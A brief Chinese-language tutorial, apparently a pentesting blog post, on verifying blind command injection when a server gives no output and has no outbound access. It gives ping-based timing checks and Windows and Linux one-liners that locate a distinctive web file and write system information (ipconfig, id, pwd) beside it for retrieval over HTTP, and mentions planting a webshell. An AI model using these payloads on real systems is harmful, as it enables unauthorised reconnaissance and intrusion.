无回显、不出网命令执行测试方式

前言

本文主要讲的是无回显、不出网命令执行测试方法，首先通过大小写判断是linux还是win，然后通过命令自动查找目录写文件来测试。

这里没有这种环境就拿一个php的做演示（其实像这种可以直接写马在当前目录）
首先我们通过下面命令和响应包的时间判断存在命令执行（适用于win linux下使用-c）

ping -n 3 127.0.0.1
ping -n 4 127.0.0.1

然后在网站上找一个名字比较少见特殊的js（如果网站有上传图片的地方可以用你上传图片的名字）

windows下的测试方式

执行下面命令自动查找bsa.js并在其目录写入文件（由于可能不知道是什么盘可能需要多次尝试）

cmd /c "for /f %i in ('dir /s /b e:bsa.js') do (echo %i> %i.path.txt)%26(ipconfig > %i.ipconfig.txt)"

在 http://www.test.com/js/ 目录下访问 bsa.js.ipconfig.txt bsa.js.path.txt查看执行ifconfig的结果和路径

linux下的测试方式

使用下面的命令，自动查找bas.js并在其目录下生成test.txt写入id pwd ifconfig命令的结果

find / -name bas.js|while read f;do sh -c 'id;pwd;ifconfig' >$(dirname $f)/test.txt;done

参考链接：https://mp.weixin.qq.com/s/9cXGR7tlN_OAP-dMyZyHEw